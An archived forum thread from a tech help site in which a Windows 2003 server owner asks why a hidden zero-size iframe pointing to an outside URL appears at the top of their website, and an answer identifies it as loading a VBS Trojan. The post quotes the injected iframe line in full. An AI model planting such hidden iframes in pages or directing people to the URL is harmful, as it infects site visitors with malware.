Solved

Virus on windows 2003 server: Iframe in top of website

Posted on 2006-10-29
3
212 Views
Last Modified: 2013-12-04
Hello,

I got a virus on my Windows 2003 Server.
On one of our major websites this line of code is placed in the top of the page:

<iframe src="http://ricewine.be/hhbb.htm" width="0" height="0" frameborder="0"></iframe>

If I open the webpage and look in the asp-file on the server, the  "iframe"-code is not there!

Anyone who know what this is? How to remove it, and why I got it?
Yes, all my software is legal, no software cracks on the server ;)

Please give me some tips to remove the virus!!!!
0
Comment
Question by:webressurs
[X]
Welcome to Experts Exchange

Add your voice to the tech community where 5M+ people just like you are talking about what matters.

  • Help others & share knowledge
  • Earn cash & points
  • Learn & ask questions
3 Comments
 
LVL 34

Expert Comment

by:Dave_Dietz
ID: 17830566
Are you hosting this on your server or is it at a hosting facility?

Do you have any ISAPI filters or wildcard application mappings configured?

Dave Dietz
0
 
LVL 1

Author Comment

by:webressurs
ID: 17832144
Yes, this is my own windows 2003 webserver.
I dont really know wht ISAPI or wildcard application are, so I guess I dont use it :)
Mabye a virus have installed something like this...? I dont unerstand how this Iframe can appear in the website header, and how to remove it...?
0
 
LVL 6

Accepted Solution

by:
Mnf earned 500 total points
ID: 17836206
i followed the link you specify and a Trojan with " VBS.Psyme.cf" was catched by kaspersky antivirus
look at this article to know more detailed about it and how it works.
http://www.f-secure.com/v-descs/fagot.shtml

i think any kind of antivirus program is good to identify this virus

0

Featured Post

Free NetCrunch network monitor licenses!

Only on Experts-Exchange: Sign-up for a free-trial and we'll send you your permanent license!

Here is what you get: 30 Nodes | Unlimited Sensors | No Time Restrictions | Absolutely FREE!

Act now. This offer ends July 14, 2017.

Question has a verified solution.

If you are experiencing a similar issue, please ask a related question

No security measures warrant 100% as a "silver bullet". The truth is we also cannot assume anything but a defensive and vigilance posture. Adopt no trust by default and reveal in assumption. Only assume anonymity or invisibility in the reverse. Safe…
Security measures require Windows be logged in using Standard User login (not Administrator).  Yet, sometimes an application has to be run “As Administrator” from a Standard User login.  This paper describes how to create a shortcut icon to launch a…
In this video we outline the Physical Segments view of NetCrunch network monitor. By following this brief how-to video, you will be able to learn how NetCrunch visualizes your network, how granular is the information collected, as well as where to f…
Monitoring a network: why having a policy is the best policy? Michael Kulchisky, MCSE, MCSA, MCP, VTSP, VSP, CCSP outlines the enormous benefits of having a policy-based approach when monitoring medium and large networks. Software utilized in this v…

726 members asked questions and received personalized solutions in the past 7 days.

Join the community of 500,000 technology professionals and ask your questions.

Join & Ask a Question